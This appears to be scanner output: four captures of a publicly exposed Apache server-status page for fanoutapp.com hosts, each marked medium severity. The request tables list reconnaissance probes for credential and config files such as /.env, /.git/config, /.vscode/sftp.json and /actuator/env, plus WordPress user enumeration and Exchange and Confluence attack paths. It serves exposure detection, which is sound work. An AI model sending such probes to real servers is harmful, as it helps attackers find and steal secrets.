Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 25-Nov-2025 06:26:43 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 8 hours 32 minutes 7 seconds Server load: 0.22 0.18 0.17 Total accesses: 5671 - Total Traffic: 17.3 MB - Total Duration: 54947 CPU Usage: u6.62 s9.77 cu84.84 cs27.31 - .0443% CPU load .0196 requests/sec - 62 B/second - 3198 B/request - 9.68912 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02260525no3yes124030 12260526no2yes124020 Sum205 248050 __________________W____________________W__________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-422605250/37/119_ 0.681325530.00.080.34 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 0-422605250/27/115_ 0.681611470.00.130.54 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-422605250/36/106_ 0.681319730.00.080.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-422605250/26/107_ 0.681711450.00.060.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-422605250/34/121_ 0.68166870.00.150.51 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-422605250/31/114_ 0.68118600.00.140.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-422605250/32/112_ 0.691013050.00.200.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-422605250/34/115_ 0.69066710.00.080.34 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-422605250/33/127_ 0.691115800.00.150.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-422605250/32/117_ 0.69167980.00.210.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-422605250/34/110_ 0.690718890.00.090.33 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-422605250/34/120_ 0.69038340.00.220.49 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-422605250/31/115_ 0.690313380.00.070.48 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-422605250/34/116_ 0.681316750.00.080.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-422605250/32/119_ 0.672715080.00.140.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-422605250/34/116_ 0.69047560.00.160.34 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/1393e25363e2130313e2135313/_/;/META-INF/maven/com.atlass 0-422605250/29/116_ 0.68207580.00.130.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-422605250/32/119_ 0.672414590.00.140.33 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4226052572/31/124W 0.67009840.00.190.48 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-422605250/30/114_ 0.6721316390.00.130.39 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-422605250/32/109_ 0.662211230.00.080.24 127.0.0.1http/1.1 0-422605250/31/118_ 0.681314030.00.070.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-422605250/31/114_ 0.68137740.00.130.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 0-422605250/31/106_ 0.68135100.00.070.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-422605250/29/113_ 0.68168310.00.130.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-422605260/20/113_ 0.485320310.00.050.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-422605260/21/114_ 0.48438850.00.050.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-422605260/20/114_ 0.483326880.00.050.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-422605260/24/113_ 0.48337820.00.070.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-422605260/21/113_ 0.484414150.00.060.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-422605260/21/111_ 0.482317740.00.060.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-422605260/23/110_ 0.48137140.00.060.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-422605260/18/112_ 0.48266900.00.050.40 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-422605260/20/121_ 0.48237620.00.060.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-422605260/14/103_ 0.47836970.00.030.25 127.0.0.1http/1.1 1-422605260/19/112_ 0.48139240.00.050.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-422605260/22/111_ 0.48036820.00.060.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-422605260/17/113_ 0.48035930.00.050.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-422605260/18/110_ 0.46935730.00.040.32 127.0.0.1http/1.1 1-4226052614/25/111W 0.480011450.00.070.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-422605260/16/107_ 0.48935830.00.040.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /login.action HTTP/1.1 1-422605260/22/120_ 0.48835840.00.120.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-422605260/15/106_ 0.468316610.00.100.37 127.0.0.1http/1.1 1-422605260/21/113_ 0.48537790.00.060.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-422605260/21/116_ 0.488310820.00.050.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-422605260/20/103_ 0.48886180.00.050.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-422605260/16/112_ 0.48866800.00.040.31 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-422605260/18/107_ 0.47848280.00.050.39 127.0.0.1http/1.1 1-422605260/19/122_ 0.48639290.00.050.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-422605260/17/102_ 0.478166250.00.040.23 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf1ba9c8f4
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 25-Nov-2025 06:26:34 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 8 hours 31 minutes 58 seconds Server load: 0.24 0.19 0.17 Total accesses: 5447 - Total Traffic: 16.5 MB - Total Duration: 54040 CPU Usage: u6.54 s9.72 cu84.84 cs27.31 - .0443% CPU load .0188 requests/sec - 59 B/second - 3170 B/request - 9.92106 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02260525no3yes025030 12260526no1yes124010 Sum204 149040 ________________________________W_________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process </SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-422605250/29/111_ 0.560225190.00.060.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-422605250/20/108_ 0.560411200.00.040.45 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-422605250/28/98_ 0.560419390.00.060.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-422605250/19/100_ 0.570211040.00.040.23 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-422605250/26/113_ 0.57056560.00.130.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-422605250/24/107_ 0.57028330.00.050.24 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 0-422605250/24/104_ 0.570312790.00.180.36 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-422605250/25/106_ 0.540116360.00.060.31 127.0.0.1http/1.1 0-422605250/24/118_ 0.550415420.00.120.42 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-422605250/23/108_ 0.55037630.00.190.37 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-422605250/25/101_ 0.560618480.00.060.30 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-422605250/25/111_ 0.55037920.00.130.40 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-422605250/23/107_ 0.540713030.00.050.46 127.0.0.1http/1.1 0-422605250/26/108_ 0.560316450.00.060.40 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-422605250/25/112_ 0.560414780.00.120.47 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-422605250/25/107_ 0.56037170.00.130.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-422605250/21/108_ 0.56037300.00.110.31 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-422605250/24/111_ 0.560314320.00.120.31 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-422605250/23/116_ 0.56029540.00.170.46 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-422605250/22/106_ 0.560416000.00.110.37 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-422605250/26/103_ 0.560310970.00.060.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-422605250/23/110_ 0.560413730.00.050.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/23/106_ 0.56067440.00.110.28 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-422605250/24/99_ 0.56034860.00.050.22 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-422605250/21/105_ 0.56057930.00.110.30 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-422605260/19/112_ 0.470320280.00.050.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-422605260/20/113_ 0.47008820.00.050.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-422605260/19/113_ 0.470326850.00.050.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-422605260/23/112_ 0.47047790.00.070.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-422605260/20/112_ 0.470314110.00.060.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-422605260/20/110_ 0.470317700.00.050.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-422605260/21/108_ 0.44147070.00.060.32 127.0.0.1http/1.1 1-422605265/16/110W 0.46006820.00.040.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-422605260/19/120_ 0.47037590.00.060.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-422605260/14/103_ 0.47036970.00.030.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-422605260/17/110_ 0.44049170.00.040.24 127.0.0.1http/1.1 1-422605260/20/109_ 0.46086750.00.060.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-422605260/15/111_ 0.46055860.00.040.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-422605260/18/110_ 0.46035730.00.040.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-422605260/24/110_ 0.460611420.00.060.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-422605260/15/106_ 0.44045800.00.040.31 127.0.0.1http/1.1 1-422605260/21/119_ 0.47035810.00.120.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-422605260/15/106_ 0.460316610.00.100.37 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-422605260/20/112_ 0.47037760.00.050.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-422605260/20/115_ 0.460310790.00.050.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-422605260/19/102_ 0.47036090.00.040.22 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-422605260/15/111_ 0.47036730.00.040.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-422605260/18/107_ 0.47048280.00.050.39 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-422605260/18/121_ 0.47039260.00.050.35 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-422605260/17/102_ 0.470166250.00.040.23 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfa7900e99
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 25-Nov-2025 06:26:31 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 8 hours 31 minutes 56 seconds Server load: 0.27 0.19 0.17 Total accesses: 5262 - Total Traffic: 15.9 MB - Total Duration: 53261 CPU Usage: u6.48 s9.66 cu84.84 cs27.31 - .0443% CPU load .0182 requests/sec - 57 B/second - 3178 B/request - 10.1218 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02260525no3yes025030 12260526no1yes124010 Sum204 149040 ___________________________________________W______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-422605250/26/108_ 0.510325080.00.050.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-422605250/16/104_ 0.510311060.00.030.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-422605250/25/95_ 0.490219250.00.050.21 127.0.0.1http/1.1 0-422605250/16/97_ 0.510310910.00.040.22 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-422605250/23/110_ 0.51046430.00.120.48 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/20/103_ 0.49048190.00.040.23 127.0.0.1http/1.1 0-422605251/20/100W 0.490012630.00.170.35 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/22/103_ 0.50086180.00.050.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-422605250/21/115_ 0.490415310.00.110.42 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-422605250/19/104_ 0.50027430.00.180.36 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-422605250/21/97_ 0.510718310.00.040.29 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api HTTP/1.1 0-422605250/22/108_ 0.51037770.00.120.39 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/21/105_ 0.510312930.00.050.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/22/104_ 0.510316270.00.050.39 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-422605250/21/108_ 0.510314630.00.110.46 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-422605250/21/103_ 0.51036980.00.110.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-422605250/18/105_ 0.51037200.00.100.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/22/109_ 0.510414250.00.110.30 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-422605250/19/112_ 0.51049400.00.160.45 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-422605250/18/102_ 0.510315790.00.100.36 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/22/99_ 0.510310740.00.050.21 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/20/107_ 0.510413610.00.040.37 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-422605250/19/102_ 0.51037280.00.100.27 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-422605250/20/95_ 0.51034680.00.040.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-422605250/17/101_ 0.51047670.00.100.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql HTTP/1.1 1-422605260/17/110_ 0.400320220.00.040.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-422605260/15/108_ 0.40088650.00.040.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-422605260/14/108_ 0.400226670.00.030.32 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-422605260/18/107_ 0.40077610.00.050.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-422605260/15/107_ 0.400413940.00.040.45 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-422605260/15/105_ 0.400817520.00.040.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-422605260/18/105_ 0.40036960.00.050.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-422605260/13/107_ 0.40036710.00.030.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-422605260/15/116_ 0.39057440.00.040.29 127.0.0.1http/1.1 1-422605260/10/99_ 0.41036840.00.020.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-422605260/14/107_ 0.40029050.00.040.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-422605260/16/105_ 0.40036550.00.040.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-422605260/11/107_ 0.40045700.00.030.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-422605260/14/106_ 0.40035600.00.030.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-422605260/20/106_ 0.400311240.00.050.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-422605260/12/103_ 0.40045680.00.030.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-422605260/17/115_ 0.41045650.00.110.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-422605260/11/102_ 0.400316450.00.090.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-4226052623/15/107W 0.40007600.00.040.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-422605260/16/111_ 0.400310620.00.040.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-422605260/15/98_ 0.41035950.00.030.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-422605260/11/107_ 0.41036560.00.030.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-422605260/15/104_ 0.41038110.00.040.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-422605260/15/118_ 0.41039150.00.040.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-422605260/13/98_ 0.41035930.00.030.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ed
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfc4316182
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 25-Nov-2025 06:26:32 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 3 days 8 hours 31 minutes 57 seconds Server load: 0.27 0.19 0.17 Total accesses: 5348 - Total Traffic: 16.2 MB - Total Duration: 53608 CPU Usage: u6.51 s9.69 cu84.84 cs27.31 - .0443% CPU load .0184 requests/sec - 58 B/second - 3173 B/request - 10.0239 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02260525no3yes025030 12260526no1yes124010 Sum204 149040 __________________________________W_______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-422605250/27/109_ 0.520425130.00.060.31 127.0.0.1http/1.1 0-422605250/18/106_ 0.540311140.00.040.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/26/96_ 0.520219270.00.050.21 127.0.0.1http/1.1 0-422605250/17/98_ 0.530710980.00.040.22 127.0.0.1http/1.1 0-422605250/25/112_ 0.54046500.00.130.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/22/105_ 0.54038270.00.050.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-422605250/22/102_ 0.530212700.00.170.35 127.0.0.1http/1.1 0-422605250/24/105_ 0.53026240.00.050.31 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-422605250/23/117_ 0.540315370.00.120.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-422605250/21/106_ 0.53057560.00.190.37 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-422605250/23/99_ 0.530318380.00.050.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-422605250/24/110_ 0.53057880.00.120.39 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-422605250/22/106_ 0.520212950.00.050.46 127.0.0.1http/1.1 0-422605250/24/106_ 0.540816380.00.050.39 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-422605250/23/110_ 0.530314700.00.120.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-422605250/23/105_ 0.53047090.00.120.30 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-422605250/19/106_ 0.53037240.00.100.30 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-422605250/23/110_ 0.520314290.00.110.30 127.0.0.1http/1.1 0-422605250/21/114_ 0.53059490.00.170.45 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-422605250/20/104_ 0.530315910.00.100.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-422605250/24/101_ 0.530310900.00.050.21 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-422605250/21/108_ 0.530413650.00.040.38 127.0.0.1http/1.1editor.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-422605250/21/104_ 0.53027340.00.100.28 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-422605250/22/97_ 0.53034750.00.040.21 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-422605250/19/103_ 0.540127840.00.110.29 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-422605260/18/111_ 0.420320250.00.050.25 127.0.0.1http/1.1 1-422605260/17/110_ 0.43028730.00.040.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-422605260/16/110_ 0.430326740.00.040.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-422605260/20/109_ 0.43037670.00.060.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /info.php HTTP/1.1 1-422605260/17/109_ 0.430314010.00.050.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-422605260/17/107_ 0.430317590.00.050.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-422605260/20/107_ 0.43037030.00.050.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-422605260/15/109_ 0.43036780.00.040.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-422605260/17/118_ 0.43037510.00.050.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-4226052655/11/100W 0.43006870.00.030.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 